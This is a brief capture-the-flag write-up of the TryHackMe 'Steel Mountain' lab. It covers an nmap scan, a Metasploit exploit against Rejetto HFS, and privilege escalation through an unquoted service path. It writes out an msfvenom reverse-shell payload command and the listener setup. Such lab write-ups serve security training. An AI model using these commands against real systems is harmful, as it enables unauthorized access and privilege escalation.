TryHackMe Steel Mountain

Awesome box using Metasploit for initial access which is always a treat.

Metasploit never disappoints, especially with a beginner friendly box such as THM "Steel Mountain". With a little bit for recon we can see that Rejetto HttpFileServer is running on port 8080.

sudo nmap -sS -sV -O -A -Pn -p 8080 -oA steelmountain 10.10.109.225

Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-08 13:41 EDT
Nmap scan report for 10.10.109.225
Host is up (0.13s latency).

PORT     STATE SERVICE VERSION
8080/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (96%), Microsoft Windows Server 2012 R2 Update 1 (96%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (96%), Microsoft Windows Vista SP1 (96%), Microsoft Windows Server 2012 or Server 2012 R2 (95%), Microsoft Windows Server 2008 SP2 Datacenter Version (94%), Microsoft Windows 7 or Windows Server 2008 R2 (94%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (93%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   128.59 ms 10.11.0.1
2   128.70 ms 10.10.109.225

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.09 seconds

Luckily for us, Metasploit has a nifty module to condcut remote code execution and obtain a low priv user meterpreter session.

msf6 exploit(multi/handler) > search Rejetto

Once we obtain our first session, it's easy to upload post-explotation tools such as "PowerUp.ps1" for additional recon which will hopefully shed light on the next steps for Privilege Escalation.

AdvancedSystemCareService9 service seems to have a Unquoted Service Path for ASCService.exe. Now that we have this information we can craft a reverse shell using msfvenom and attmept to priv esc.

sudo msfvenom -p windows/shell_reverse_tcp LHOST=10.11.36.145 LPORT=4443 -e x86/shikata_ga_nai -f exe-service -o ASCService.exe

Upload our new executable to target machine!

Ensure that we have a multi handler listening on port 4443

use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST 10.11.36.145
set LPORT 4443
exploit -j

Now, we need to stop and restart AdvancedSystemCareService9.

Boom!!! We have our callback!!

PreviousTryHackMe Attacktive Directory NextSliver Red Team Infrastructure

Last updated 2 years ago